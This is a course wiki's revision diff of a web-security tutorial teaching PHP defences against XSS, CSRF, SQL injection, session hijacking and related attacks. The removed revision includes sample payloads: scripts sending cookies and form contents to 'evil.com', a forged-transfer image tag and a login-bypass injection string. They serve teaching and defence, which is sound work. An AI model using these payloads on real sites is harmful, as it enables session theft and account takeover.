Difference between revisions of "Web Application Security, Part 1"

From CSE330 Wiki
Jump to navigationJump to search
 
(22 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
Application-level web security is of increasing concern among web developers.  This article outlines some types of security threats to your web application and how to solve those threats.
 
Application-level web security is of increasing concern among web developers.  This article outlines some types of security threats to your web application and how to solve those threats.
  
This is Part 1 of the Web Application Security article, geared toward the material covered in [[Module 2]].  For material covered in [[Module 3]] (MySQL), see [[Web Application Security, Part 2]].  For material covered in [[Module 4]] (JavaScript), see [[Web Application Security, Part 3]].
+
This is Part 1 of the Web Application Security article, geared toward the material covered in [[Module 2]].  For material covered in [[Module 3]] (MySQL), see [[Web Application Security, Part 2]].  For material covered in [[Module 6]] (JavaScript), see [[Web Application Security, Part 3]].
  
 
== Introduction to Application-Level Web Security ==
 
== Introduction to Application-Level Web Security ==
Line 11: Line 11:
 
Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector.  '''NEVER TRUST USER INPUT!!!'''  This can be summarized in the acronym FIEO, or ''Filter Input, Escape Output''.
 
Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector.  '''NEVER TRUST USER INPUT!!!'''  This can be summarized in the acronym FIEO, or ''Filter Input, Escape Output''.
  
== Cross-Site Scripting ==
+
=== FIEO in PHP ===
  
TODO: Move this to Part 3.
+
==== Filtering Input ====
  
Cross-Site Scripting, or '''XSS''', is when an attacker targets an area of your application in which user-supplied input is included in application outputThe attacker may use JavaScript to read confidential information and send it to his/her own servers.
+
"Filter Input" means that you should check that input data is of the format that you are expecting.  For example, if you are expecting a number, you should cast it to a float or an intIf you are expecting a phone number, you should run it through a regular expression (you will learn regular expressions in module 4). For example:
  
There are two types of XSS attacks: '''persistent''' and '''reflected'''.
+
<source lang="PHP">
 
 
=== Persistent XSS ===
 
 
 
''Persistent XSS'' occurs when a web site stores input in a database and displays it to victims later.  A common vector for Persistent XSS are forum posts or shoutboxes.
 
 
 
For example, consider this code:
 
 
 
<source lang="php">
 
<?php
 
 
 
$res = $mysqli->query("SELECT * FROM shoutbox ORDER BY created_at DESC LIMIT 5");
 
 
 
while($row=$res->fetch_assoc()){
 
echo "<p>".$row["content"]."</p>\n";
 
}
 
 
 
?>
 
</source>
 
 
 
In this example, content from the database is displayed ''verbatim'' to the end user.  This is vulnerable to a Persistent XSS attack.  Suppose the attacker, a computer specialist on contract for BuyShoes.com, typed the following code into the shoutbox:
 
 
 
<nowiki><script> document.location.href = "http:/www.BuyShoes.com/"; </script></nowiki>
 
 
 
Everyone viewing the shoutbox will now be automatically forwarded to BuyShoes.com!  The shoe manufacturers will be pleased, but most everyone else will be annoyed.  (Needless to say, XSS can be used for much more malicious things than rogue marketing.)
 
 
 
==== Solution ====
 
 
 
You need to escape the output.  In PHP, you can do this using the <code>htmlentities()</code> function:
 
 
 
<source lang="php">
 
 
<?php
 
<?php
 +
// Cast a number to a float or an int:
 +
$amount = (float) $_POST['amount'];
  
$res = $mysqli->query("SELECT * FROM shoutbox ORDER BY created_at DESC LIMIT 5");
+
// Pass a phone number through a regular expression:
 
+
$phone = preg_match('/\d{3}-\d{3}-\d{4}/', $_POST['phone']) ? $_POST['phone'] : "";
while($row=$res->fetch_assoc()){
 
$safe = htmlentities($row["content"]);
 
echo "<p>".$safe."</p>\n";
 
}
 
 
 
 
?>
 
?>
 
</source>
 
</source>
  
Now, the script would appear as text to the user, and it will not execute.  This Persistent XSS threat has been put to rest!
+
==== Escaping Output ====
 
 
=== Reflected XSS ===
 
 
 
Reflected XSS is when a web page accepts input and then displays it immediately as output (without the database intermediate).  A common vector for Reflected XSS attacks are search queries.
 
 
 
For example, consider the code:
 
 
 
<source lang="php"><nowiki>
 
<?php
 
 
 
echo "<h1>Transaction History for: " . $_GET['username'] . "</h1>\n";
 
 
 
?>
 
</nowiki></source>
 
 
 
This is vulnerable to a Reflected XSS attack.  The attacker could trick the victim into visiting this link:
 
 
 
<nowiki>http://www.bank.com/history.php?username=mothergoose+%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2Fwww.evil.com%2Frecord_cookie%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E</nowiki>
 
 
 
In some ways, this is more mysterious than Persistent XSS, because it's not clear what's going on.  But this is the code that will be displayed on the page:
 
 
 
<nowiki><h1>Transaction History for: mothergoose <script>new Image().src="http://www.evil.com/record_cookie?"+document.cookie;</script></h1></nowiki>
 
 
 
Aye yie yie!
 
 
 
==== Solution ====
 
 
 
To fix this, we again need to escape output:
 
 
 
<source lang="php"><nowiki>
 
<?php
 
 
 
$safe_username = htmlentities($_GET['username']);
 
 
 
echo "<h1>Transaction History for: " . $safe_username . "</h1>\n";
 
 
 
?>
 
</nowiki></source>
 
 
 
And now our Reflected XSS vulnerability has been put to rest.
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.xssed.com/news/130/F-Secure_McAfee_and_Symantec_websites_again_XSSed/ F-Secure, McAfee, and Symantec, January 2012] (Reflected XSS)
 
* [http://www.h-online.com/security/news/item/Potential-account-theft-with-XSS-hole-in-eBay-de-1320908.html eBay Germany, August 2011] (Reflected XSS)
 
* [http://www.eweek.com/c/a/Security/Facebook-Bully-Video-Actually-a-XSS-Exploit-121829/ Facebook, April 2011] (Persistent XSS)
 
* [http://news.softpedia.com/news/eBay-and-PayPal-XSSed-Again-159733.shtml PayPal, October 2010] (Reflected XSS)
 
* [http://news.softpedia.com/news/XSS-Flaw-Found-on-Secure-American-Express-Site-159439.shtml American Express, October 2010] (Reflected XSS)
 
* [http://threatpost.com/en_us/blogs/persistent-xss-bug-twitter-being-exploited-092110 Twitter, September 2010] (Persistent XSS)
 
 
 
== Cross-Site Request Forgery ==
 
 
 
A cross-site request forgery (CSRF, pronounced ''sea-surf'') involves a victim, who is logged in to the targeted site, visiting an attacker’s site.  The attacker has code on his site that forces the victim to unwittingly perform actions on the targeted site.
 
 
 
For example, suppose Mother Goose visited Dr. Evil's blog.  Dr. Evil had the following tag embedded in his bloc:
 
 
 
<nowiki><img src="http://www.bank.com/transfer.php?dest=dr-evil&amp;amount=5000" /></nowiki>
 
 
 
This would cause Mother Goose to authorize a $5000 transfer to Dr. Evil, completely without Mother Goose's knowledge!
 
 
 
Worse yet, Dr. Evil could just send an e-mail to Mother Goose with this image tag.  All Mother Goose would need to do to be attacked is open the e-mail!  (Now you know why sometimes your e-mail client turns off images from suspicious sources.)
 
 
 
=== Solution ===
 
 
 
The first precautionary measure is to always use POST requests (as opposed to GET requests) for actions that change something on your server.  This will fend off all except the most hard-core CSRF attacks.
 
 
 
However, fully preventing CSRF attacks is not difficult.  To do this, you can use a '''CSRF token'''.  A CSRF token is a known string of text that is submitted in all of the forms on your site.  If the string is not what you expect, then you can assume that the request was forged.
 
  
For example, consider this form:
+
"Escape Output" means that you need to nullify, or ''escape'', characters that have special meaning in the markup language of interest.  For example, consider the following string:
  
<source lang="html">
+
<source lang="html4strict">
<form action="transfer.php">
+
If a<b and b<c then a<c.
<input type="text" name="dest" />
 
<input type="number" name="amount" />
 
<input type="submit" value="Transfer" />
 
</form>
 
 
</source>
 
</source>
  
We can easily add a hidden CSRF token field like so (as well as making the form POST rather than GET):
+
Since a less-than sign means the start of a tag in HTML, and '''b''' is a valid tag name, the above string will ''not'' render as you might expect in HTML.  Therefore, we need to ''escape'' our less-than signs by using HTML entities:
  
<source lang="html">
+
<source lang="html4strict">
<form action="transfer.php" method="post">
+
If a&lt;b and b&lt;c then a&lt;c.
<input type="text" name="dest" />
 
<input type="number" name="amount" />
 
<input type="hidden" name="token" value="<?=$_SESSION['token'];?>" />
 
<input type="submit" value="Transfer" />
 
</form>
 
 
</source>
 
</source>
  
This assumes that <code>$_SESSION['token']</code> contains an alphanumeric string that was randomly generated upon session creation.  We can now test for validity of the CSRF token on the server side (in transfer.php):
+
The "&lt;" is an '''HTML entity''' that will render as a less-than sign. (For more information on HTML entities,  
 
+
[https://webplatform.github.io/docs/html/entities read this article on the WebPlatform wiki].)
<source lang="php">
 
<?php
 
$destination_username = $_POST['dest'];
 
$amount = $_POST['amount'];
 
if($_SESSION['token'] !== $_POST['token']){
 
die("Request forgery detected");
 
}
 
$mysqli->query(/* perform transfer */);
 
?>
 
</source>
 
 
 
Now, if Mother Goose were to view a page containing the malicious <img/> tag, the transfer would not take place.
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.zdnet.com/no-data-breach-in-first-weibo-attack-2062301014/ Weibo (the Chinese Twitter), June 2011]
 
* [http://www.huffingtonpost.com/huff-wires/20110601/us-tec-google-hacking-attack/ Gmail, June 2011]
 
* [http://www.pcworld.com/businesscenter/article/228609/hackers_steal_hotmail_messages_thanks_to_web_flaw.html Hotmail, May 2011]
 
* [http://www.theregister.co.uk/2010/05/19/facebook_private_data_leak/ Facebook, May 2010]
 
 
 
== SQL Injection ==
 
 
 
TODO: Move this to part 2.
 
 
 
http://imgs.xkcd.com/comics/exploits_of_a_mom.png (TODO: embed image here)
 
 
 
 
 
SQL injection occurs when an attacker submits specially-crafted input into your server, which is then included in an SQL query.  The input modifies the query to perform additional actions on the database or to access unwanted information.
 
  
For instance, suppose you had the following code:
+
PHP provides a function that, given a string, will convert special characters to their HTML entity equivalents.
  
<source lang="php">
+
<source lang="PHP">
 
<?php
 
<?php
require 'database.php';
+
$str = "If a<b and b<c then a<c.";
 
 
/* DISCLAIMER: THIS CODE IS BAD IN MANY MORE WAYS THAN JUST
 
BEING VULNERABLE TO SQL INJECTION! IT IS FOR DEMONSTRATION OF
 
CONCEPT ONLY. DO NOT USE THIS CODE IN YOUR OWN PROJECTS! */
 
 
 
$res = $mysqli->query("SELECT id FROM users WHERE username='".$_POST['username']."' AND password='".$_POST['password']."'");
 
 
 
if( $res->num_rows==1 ){
 
    $row = $res->fetch_assoc();
 
    $_SESSION['user_id'] = $row["id"];
 
}else{
 
    echo "Login failed.";
 
    exit;
 
}
 
?>
 
</source>
 
 
 
This code is vulnerable to SQL injection.  For example, suppose the attacker used the following string of text for his username:
 
 
 
mother-goose' --
 
 
 
Here's what the resulting query would look like:
 
 
 
<source lang="mysql">
 
SELECT id FROM users WHERE username='mother-goose' --' AND password=''
 
</source>
 
 
 
Since <code>--</code> is the start of a comment in SQL, when MySQL interprets this query, it will ''completely ignore'' the password-checking part of the query!  Dr. Evil can log in using anyone's username and steal all of their money!
 
 
 
=== Solution ===
 
  
If you write your queries manually (as in the example above), you need to use <code>$mysqli->real_escape_string()</code> to sanitize your input:
+
// Convert special characters to HTML entities before outputting:
 
+
echo htmlentities($str);
<source lang="php">
 
<?php
 
$safe_username = $mysqli->real_escape_string($_POST['username']);
 
// ...
 
 
?>
 
?>
 
</source>
 
</source>
  
However, the better solution is to use prepared queries.  For more information on prepared queries, see [[MySQL]].
+
'''Note:''' ''htmlentities'' escapes a string for use in HTML, but it does ''not'' escape a string for use in other markup languagesYou need to use different methods when escaping strings for other languages.
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.zdnet.com/unknowns-hack-european-space-agency-4010026071/ European Space Agency, May 2012]
 
* [http://www.dutchnews.nl/news/archives/2012/04/new_online_medical_records_sca.php Dutch Department Stores, April 2012]
 
* [http://www.msnbc.msn.com/id/46735808/ns/technology_and_science-security/ Ancestry.com, March 2012]
 
* [http://www.scmagazine.com.au/News/292592,allphones-hacked-staff-passwords-exposed.aspx Allphones (Australian Telecommunications Retailer), March 2012]
 
* [http://www.abc4.com/content/news/slc/story/More-fallout-Salt-Lake-City-police-website-hacked/PiSspE768UiioitJ3K4gyQ.cspx Salt Lake City Police Department, February 2012]
 
 
 
== Password Security ==
 
 
 
Let's assume for a moment that despite all of your efforts in the other fronts of web security, an attacker was still able to extract information from your database.  If you store your passwords as plain text, not only will the attacker be able to log in as whomever he chooses, but the attacker will ''also'' likely be able to log in as the users of your site on different sites (since many users employ the same password on several different web sites).
 
 
 
=== Encryption ===
 
 
 
The types of encryption and encryption algorithms is a whole class to itself.
 
 
 
In CSE330 and future web application development, you should always use '''one-way encryption''' to encrypt your passwords.  What this means is that you feed a string of text (a password) to an encryption function, and that encryption function returns another string of text that is a ''digest'' of the password.  It is impossible to mathematically convert a digest back to its associated password, but encrypting the same password will always yield the same digest.
 
 
 
One-way encryption algorithms can also be ''salted''.  What this means is that the string to be encrypted is modified by a ''salt'' before the encryption occursThe same salt and the same password will always yield the same digest.  Using a salted hashing algorithm is preferable to a non-salted hashing algorithm for passwords because although digests cannot be reversed, non-salted digests can be looked up in a rainbow table.
 
  
=== Solution ===
+
=== Why Not to Escape Input ===
  
So, the solution is to store salted, one-way-encrypted passwords in your databasePHP provides the [http://php.net/crypt crypt()] function to do this for you.
+
Filtering your input is important, as shown above.  However, it is bad practice to ''escape'' your inputFor example, don't do this:
  
<source lang="php">
+
<source lang="PHP">
 
<?php
 
<?php
// This is a *good* example of how you can implement password-based user authentication in your web application.
+
$message = htmlentites($_POST['amount']); // bad practice
 
+
// then store $message in a database, etc.
require 'database.php';
 
 
 
// Use a prepared statement
 
$stmt = $mysqli->prepare("SELECT COUNT(*), id, crypted_password FROM users WHERE username=?");
 
 
 
// Bind the parameter
 
$stmt->bind_param('s', $user);
 
$user = $_POST['username'];
 
$stmt->execute();
 
 
 
// Bind the results
 
$stmt->bind_result($cnt, $user_id, $pwd_hash);
 
$stmt->fetch();
 
 
 
$pwd_guess = $_POST['password'];
 
// Compare the submitted password to the actual password hash
 
if( $cnt == 1 && crypt($pwd_guess, $pwd_hash)==$pwd_hash){
 
// Login succeeded!
 
$_SESSION['user_id'] = $user_id;
 
// Redirect to your target page
 
}else{
 
// Login failed; redirect back to the login screen
 
}
 
 
?>
 
?>
 
</source>
 
</source>
  
'''Note:''' You may sometimes see functions like [http://php.net/md5 md5()] used to encrypt passwords.  md5() does indeed perform one-way encryption, but it does so without a salt.  '''THIS IS BAD PRACTICE''', because unsalted md5 hashes can be trivially reversed using a rainbow table.  (Just Google for "md5 decrypter".)  Using a salt prevents the effective use of a rainbow table.
+
The reason this is bad practice is that it permanently ties that string to its final output formatFor example, what if some time down the road you want to support display of that message in a PDF?  You'd need to go back and remove all the HTML entities again.
 
 
=== OpenID ===
 
 
 
One other solution that will solve ''all'' issues related to password security is to not have passwords at allThis can be achieved using [[wikipedia:OpenID|OpenID]], which allows end users to use their accounts from other sites (e.g. Google, Yahoo, and Twitter) to authenticate on your site.  Not only does this make your life easier in the security realm, but it also eliminates the need for password recovery, etc.
 
 
 
There are many PHP libraries available for OpenID authentication; one such library is the creatively named [http://pear.php.net/package/OpenID OpenID], which you can install using [[PHP#PEAR|PEAR]].  You will need to install some other packages first, some from yum (if using RHEL) and some from pear.  (If you don't install them, PEAR will yell at you.)  These are the commands you need to run in order to install the correct packages (make sure you understand what they do before running them!):
 
 
 
sudo yum install php-mbstring php-bcmath # not necessary on Debian
 
sudo apachectl graceful
 
sudo pear install Crypt_DiffieHellman-0.2.6 Validate-0.8.5 Services_Yadis-0.5.1 OpenID-0.3.3
 
 
 
Here's an example implementation that uses the PEAR package.
 
 
 
'''Login Page:'''
 
<source lang="php"><nowiki>
 
<form action="process_openid.php" method="post">
 
<input id="start" name="start" type="hidden" value="true" />
 
<fieldset>
 
<legend>Sign in using OpenID</legend>
 
<div id="openid_choice">
 
<p>Please select your account provider:</p>
 
<select name="identifier">
 
<option value="https://www.google.com/accounts/o8/id">Google</option>
 
<option value="http://yahoo.com/">Yahoo</option>
 
</select>
 
</div>
 
<p>
 
<input type="submit" value="Sign In"/>
 
</p>
 
</fieldset>
 
</form>
 
</nowiki></source>
 
 
 
'''process_openid.php:'''
 
<source lang="php"><nowiki>
 
<?php
 
require_once 'OpenID/RelyingParty.php';
 
require_once 'OpenID/Message.php';
 
require_once 'Net/URL2.php';
 
 
 
session_start();
 
 
 
$realm = "http://www.yoursite.com/";
 
$returnTo = $realm . "path/to/process_openid.php";
 
 
 
$identifier = @$_POST['identifier'] ?: @$_SESSION['identifier'] ?: null; // note: the @ signs suppress "undefined" notices
 
 
 
$o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 
 
 
// Part 1: We are processing a login request before visiting the OpenID provider
 
if(@$_POST['start']) {
 
$authRequest = $o->prepare();
 
$url = $authRequest->getAuthorizeURL();
 
 
header("Location: ".$url);
 
exit;
 
}
 
 
 
// Part 2: The user is returning to our site after visiting the OpenID provider's site
 
else {
 
$usid = @$_SESSION['identifier'] ?: null;
 
unset($_SESSION['identifier']);
 
 
 
$queryString = count($_POST) ? file_get_contents('php://input') : $_SERVER['QUERY_STRING'];
 
 
$message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
 
 
 
$result = $o->verify(new Net_URL2($returnTo . '?' . $queryString), $message);
 
 
if($result->success()){
 
// Login Success!
 
 
// Get the OpenID identifier, which is unique to every OpenID user (i.e. you can use it in your database to
 
// keep track of people between logins), and save it in the session:
 
$_SESSION["openid.identity"] = $message->get("openid.identity");
 
 
// Now redirect to the target page for logged-in users
 
}else{
 
// Login Failed. You can redirect back to the login page or whatever
 
}
 
}
 
?>
 
</nowiki></source>
 
 
 
'''Disclaimer:''' OpenID does have security issues in its own right, especially phishing-type vulnerabilities, but they are almost exclusively tied to the OpenID identity providers (Google, Yahoo, etc), not the OpenID relying party (you).  Using an SSL connection will help to solve many of these security issues.  And ultimately, it's safe to rest assured that profit-driven OpenID providers are quick to respond when such security vulnerabilities are reported.
 
 
 
=== Real-Life Examples ===
 
 
 
Here is a constantly-updated list of sites that do not use proper password security: http://plaintextoffenders.com/
 
 
 
== Session Hijacking ==
 
  
Session Hijacking is when an attacker captures an established session identifier, and then uses that identifier to browse the targeted site under the victim’s identity. The capturing process is often done via XSS.  For instance, suppose Dr. Evil posted the following comment in a Shoutbox:
+
This is why you should ''filter'' strings at the input stage but not ''escape'' them until the final output stage.
  
How about them Cardinals! <script> new Image().src = "http://www.evil.com/record_cookie?" + encodeURIComponent(document.cookie); </script>
+
== Format String Injection ==
  
Everyone viewing the shoutbox will now see Dr. Evil's shout, but they will also unwittingly have their cookies sent to Dr. Evil's server.  Since cookies contain the Session ID, Dr. Evil can use that Session ID to surf the targeted site under anyone's identity.
+
If you like using functions like '''printf''' and '''sprintf''', you may find yourself writing
 
 
=== Solution ===
 
 
 
First, prevent XSS.  Once you've done that, there are some extra things you can do to fend off session hijackers.
 
 
 
==== HTTP-Only Cookies ====
 
 
 
The first is to use the HTTP Only option on cookies, which prevents cookies from being read by JavaScript (and therefore by XSS).  To do this, you can change the <code>session.cookie_httponly</code> option in php.ini, or you can just use <code>ini_set()</code> before you start your session:
 
  
 
<source lang="php">
 
<source lang="php">
<?php
+
printf( "%s", htmlentities($_GET['username']) ); // good example
 
 
ini_set("session.cookie_httponly", 1);
 
 
 
session_start();
 
 
 
?>
 
 
</source>
 
</source>
  
'''Disclaimer:''' The HTTP Only option is relatively new in browsers, so customers using older browsers will not enjoy the extra protection.
+
It is tempting to reduce this to
 
 
==== User Agent Consistency ====
 
 
 
A second thing you can do to help prevent session hijacking is to check the ''HTTP User Agent'' between requests.  Since cookies are sandboxed inside a browser, and a browser's user agent doesn't change unless it is rebooted (except in edge cases), then the user agent should always be consistent throughout a session.
 
 
 
You can test for HTTP User Agent consistency like this:
 
  
 
<source lang="php">
 
<source lang="php">
<?php
+
printf( htmlentities($_GET['username']) ); // BAD example
 
 
session_start();
 
 
 
$previous_ua = @$_SESSION['useragent'];
 
$current_ua = $_SERVER['HTTP_USER_AGENT'];
 
 
 
if(isset($_SESSION['useragent']) && $previous_ua !== $current_ua){
 
die("Session hijack detected");
 
}else{
 
$_SESSION['useragent'] = $current_ua;
 
}
 
 
 
?>
 
 
</source>
 
</source>
  
=== Session Fixation ===
+
Although the second implementation will work for most usernames, it is '''''not''''' correctYou are essentially making the client-provided username the ''format string'' for printfIf the username contains any percentage sign (%), it will be interpreted as the start of a parameter in the format string, causing your script to return errorsWorse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.
 
 
One word you might hear in the web application security community is ''session fixation''.  In many ways, this is the opposite of session hijacking: rather than the attacker taking on the victim's identity, the attacker forces the victim into taking on an identity of the attacker's choice.
 
 
 
Fortunately, PHP's cookie-based sessions are not as vulnerable to session fixation attacks as are sessions that are passed through the URL.  The same measures that you use to prevent session hijacking should also prevent session fixation.
 
 
 
There is one thing you can do to help mitigate session fixation, though, and it's also good practice: change the name of the default PHP session ID cookie.  To do this, use the function [http://php.net/session_name session_name()] in PHP, or change the '''session.name''' directive in php.ini.
 
 
 
=== Real-Life Examples ===
 
 
 
Application-level session hijacking is not an attack vector frequently observed by high-profile companies, although any site vulnerable to XSS is probably vulnerable to application-level session hijacking.
 
 
 
On the other hand, packet-sniffing session hijacking attacks have numerous examples.  For more information, see [[#Packet Sniffing|Packet Sniffing]].
 
 
 
== Denial of Service ==
 
 
 
Denial of Service (DoS) is probably the most widely used attack vector to date, and the one employed by hacktivist groups like Anonymous.  The concept is simple: flood a target server with more requests than it can possibly handle, resulting in server downtime.
 
 
 
A ''Distributed'' Denial of Service (DDoS) attack is a special kind of Denial of Service attack that involves multiple, unrelated machines sending requests to the server simultaneously.  DDoS attacks are more powerful than "un-distributed" DoS attacks because there are dozens, hundreds, even thousands of machines, all with different IP addresses, all requesting data from your server at the same time; in DoS attacks, there is only one computer doing the attacking.  Hacking groups are known to have millions of machines around the world ready to perform a DDoS attack on command.  It's a very interesting topic to Google about, but beware that you might spend several hours reading web sites if you start!
 
 
 
There are two flavors that a DoS attack can take:
 
 
 
* '''Bandwidth-based:''' Saturate the connectivity link.
 
* '''Packet-based:''' Saturate the processing capability of the equipment.
 
 
 
=== Mitigating DoS Attacks ===
 
 
 
Unlike the other types of attacks we've discussed (or will soon be discussing), DoS attacks cannot usually be prevented by good coding practices. Here are some tips that should help:
 
 
 
* Always keep the most up-to-date software on your server and firmware on your router (if applicable).
 
* If you represent a firm with a lot of resources, '''anycast''' may be an option.  Rather than having your site hosted in just one server, the load of your site will be shared between many different servers.  Anycast systems are expensive, but they help fend off non-hardcore DoS attacks.
 
* You can set up a ''constellation'' of reverse proxy nodesYou might also benefit from using a web server like Nginx instead of Apache.  For more information on constellation reverse proxy nodes, see: http://blog.unixy.net/2010/08/the-penultimate-guide-to-stopping-a-ddos-attack-a-new-approach/
 
* Limit things like file upload size and CGI scripts.  These are known to be easy targets for DoS attacks.
 
 
 
In short, DoS attacks are not pretty, and there's not any sure-fire way to prevent them.  Just do your best and hope that you don't get attacked by DoS.
 
 
 
=== Real-Life Examples ===
 
 
 
* [http://www.theregister.co.uk/2012/05/21/india_anonymous_cert_ddos/ Indian CERT, May 2012 (DDoS)]
 
* [http://mashable.com/2012/05/20/anonymous-hackers-police-website/ Chicago Police Department, May 2012 (DDoS)]
 
* [http://torrentfreak.com/pirate-bay-under-ddos-attack-from-unknown-enemy-120516/ Pirate Bay, May 2012 (DDoS)]
 
 
 
== Content Spoofing ==
 
 
 
Content Spoofing is when an attacker attempts to mimic the functionality on your site.  '''Phishing''' is when an attacker uses content spoofing to mine information from victims.  For example, victims may log in to the attacker's site, believing that it is your site, giving the attacker the victims' usernames and passwords.
 
 
 
Content spoofing is frequently performed by using misleading URLs.  For instance, consider the following:
 
 
 
* www.bank.com.tr/ansfer.php
 
* www.bank.com/transfer.php
 
 
 
However, content spoofing can also be performed when there is an XSS vulnerability in your site.  If the XSS is Reflected, the injected code could forward to an attacker's site, even though the link belongs to your site.  If the XSS is Persistent, the attacker could either re-write your site or simply modify the Form prototype to send all form data to the attacker's server before submitting the form (that is, at least when the form is submitted using JavaScript):
 
 
 
<script><nowiki> var old_sub=HTMLFormElement.prototype.submit; HTMLFormElement.prototype.submit = function(){ new Image().src = "http://www.evil.com/?"+encodeURIComponent(this.innerHTML); old_sub.apply(this, arguments); } </nowiki></script>
 
 
 
Do you see now how preventing XSS will also prevent several other types of web application attack vectors?
 
 
 
=== Solution ===
 
 
 
Content Spoofing is largely out of your control as a web developer.  You should give users a way to confirm that your site is legitimateFor example, when logging in to your site, you could have users put in their username first, then show the user a picture associated with their account before asking them to put in their password.  (Or just use OpenID.)
 
 
 
=== Real-Life Examples ===
 
 
 
[http://kb.cadzow.com.au:15384/cadzow/details.aspx?ID=1422 Several Banks (phishing e-mail scams)]
 
[http://www.consumerfraudreporting.org/phishing_examples.php More Banks (phishing e-mail scams)]
 
 
 
== Packet Sniffing ==
 
 
 
HTTP Packet Sniffing is a fundamental web attack that has been known for a long time, but it was never widely exploited.  Essentially, the attacker can listen on his current WiFi connection for packets going in and out, then either act as a "man in the middle" to either perpetuate a Content Spoofing attack or just hijack the victim's session.  (This is when user agent testing would prove helpful.)  The Firesheep plugin for Firefox makes it easy to perform Packet Sniffing attacks yourself: just go to Starbuck's, open up Firesheep, and you can hijack anyone's session who is on the same public WiFi.  Scary.
 
  
 
=== Solution ===
 
=== Solution ===
  
The best and easiest way to prevent packet sniffing is to secure your site with an SSL certificate ('''https''')This will cause each request to perform handshakes, preventing Man-in-the-Middle attacks.  Unfortunately, SSL certificates are not free; you can expect to pay around $100 per year for a small web site.  Because of the handshakes, they also consume slightly more resources.  However, if your site controls sensitive data from users (e.g. credit card information), an SSL certificate is a must.
+
The solution is simple: never put dynamic input as the format stringIt should always be static, either hard-coded or from a stable source like a YAML file. User-supplied input should ''always'' be fed into the string as arguments to sprintf and printf.
 
 
=== Real-Life Examples ===
 
 
 
Any web site that does not use the HTTPS protocol is vulnerable to packet sniffing attacks.  After the release of applications like [http://www.redmondpie.com/faceniff-app-makes-it-easy-to-hack-facebook-twitter-and-youtube-accounts-from-android-phones/ Faceniff] and [http://www.pcworld.com/article/209333/how_to_hijack_facebook_using_firesheep.html Firesheep], high-profile sites have switched to using the HTTPS protocol by default:
 
 
 
* [http://articles.economictimes.indiatimes.com/2010-01-15/news/27620470_1_gmail-encryption-email-service Gmail, January 2010]
 
* [http://archive.techtree.com/techtree/jsp/article.jsp?article_id=114302&cat_id=643 Facebook, January 2011]
 
* [http://archive.techtree.com/techtree/jsp/article.jsp?article_id=114805&cat_id=643 Twitter, March 2011]
 
 
 
== Abuse of Functionality ==
 
 
 
''Abuse of Functionality'' is a general term that refers to when an attacker exploits vulnerabilities in the logic of your application.
 
 
 
For example, suppose you were a banking site, and you had the following code to perform a transaction:
 
 
 
<source lang="php">
 
<?php
 
$mysqli->autocommit(false); // start transaction
 
$mysqli->query("UPDATE users SET balance=balance-".$amount."
 
WHERE id=".$_SESSION['user_id']);
 
$mysqli->query("UPDATE users SET balance=balance+".$amount."
 
WHERE username='".$destination_username."'");
 
$mysqli->commit(); // commit transaction
 
?>
 
</source>
 
 
 
It may not be obvious, but if you don't filter your input, it is trivial for an attacker to ''insert a negative number'' into the "amount" field and transfer money from anyone's account to his account!  The solution here is to simply filter amount for what you expect (in this case, a positive number that is not greater than the user's current balance).
 
 
 
=== Filtering on the Client Side is Never Enough ===
 
 
 
Suppose you have an e-mail field in a form in HTML, and you use some JavaScript function (or HTML5) to check it for form as an e-mail address:
 
 
 
<source lang="html">
 
<input type="text" name="email" onchange="checkEmail(this);" /> <!-- HTML versions ≤ XHTML 1.0 -->
 
  
<input type="email" name="email" /> <!-- HTML versions ≥ 5 -->
+
If you are outputting only one little string like in the example above, it suffices to use a PHP function like '''print''' or '''echo''':
</source>
 
 
 
With this filter in place, any layperson using your form is now required to submit an e-mail address in that field.  ''However'', it is trivial for an attacker to bypass this client-side filtering (e.g., by using web developer tools like Firebug) and still submit non-email text to your server.  This is why '''IT IS ESSENTIAL THAT YOU FILTER INPUT ON THE SERVER SIDE!  Any sort of filtering on the client side are just bells and whistles for the end user.'''
 
 
 
=== Information Leakage ===
 
 
 
''Information Leakage'' is a noteworthy type of ''Abuse of Functionality'' attack that involves unprivileged users accessing privileged information.  In fact, Information Leakage accounts for a significant percentage of all recorded web application vulnerabilities (second only to Cross-Site Scripting).
 
 
 
The concept is relatively simple.  Suppose you have an administration page that loads an image containing a graph of all activity on your site:
 
 
 
'''admin.php'''
 
<source lang="php">
 
<?php
 
if($_SESSION['admin']) echo '<img src="stats.php?day=2012-08-19" alt="Stats for 2012-08-19" />';
 
?>
 
</source>
 
  
'''stats.php'''
 
 
<source lang="php">
 
<source lang="php">
<?php
+
print htmlentities($_GET['username']); // good example
// query the database, and save the results in $result
+
echo htmlentities($_GET['username']); // good example
 
 
$im = new PNGraph();
 
$im->takeData($result);
 
 
 
header("Content-Type: image/png");
 
print $im->toString();
 
?>
 
 
</source>
 
</source>
 
Notice how you check for admin credentials in ''admin.php''.  However, you forgot to do this in ''stats.php'' itself.  An attacker could simply load ''stats.php'' directly to see all of the sensitive admin-only information!
 
 
==== Solution ====
 
 
Information Leakage is an attack that requires the developer to see the big picture and really keep track of what's going on in his or her application.  As a rule of thumb, ''whenever'' you query the database to access sensitive information, check the permissions of the user first.
 
 
=== A Note about Frameworks ===
 
 
Web frameworks are designed to make web development more agile, but they in turn have security weaknesses of their own.  For instance, the infamous ''mass-assignment vulnerability'' in Ruby on Rails-type MVC frameworks is an abuse of functionality vulnerability that enables attackers to save arbitrary information in your database (!).
 
 
The important thing to know is that '''if you use a web framework, be familiar with the security considerations with that framework'''.  Most of the time, frameworks will have articles on their web sites that discuss these concerns.  (If your framework doesn't have a guide like this, you should probably be using a different framework!)
 
 
=== Real-Life Examples ===
 
 
* [http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/ Hotmail, April 2012 (parameter manipulation)]
 
* [http://www.theregister.co.uk/2012/04/18/toshiba_slapped_by_ico/ Toshiba, April 2012 (parameter manipulation / information leakage)]
 
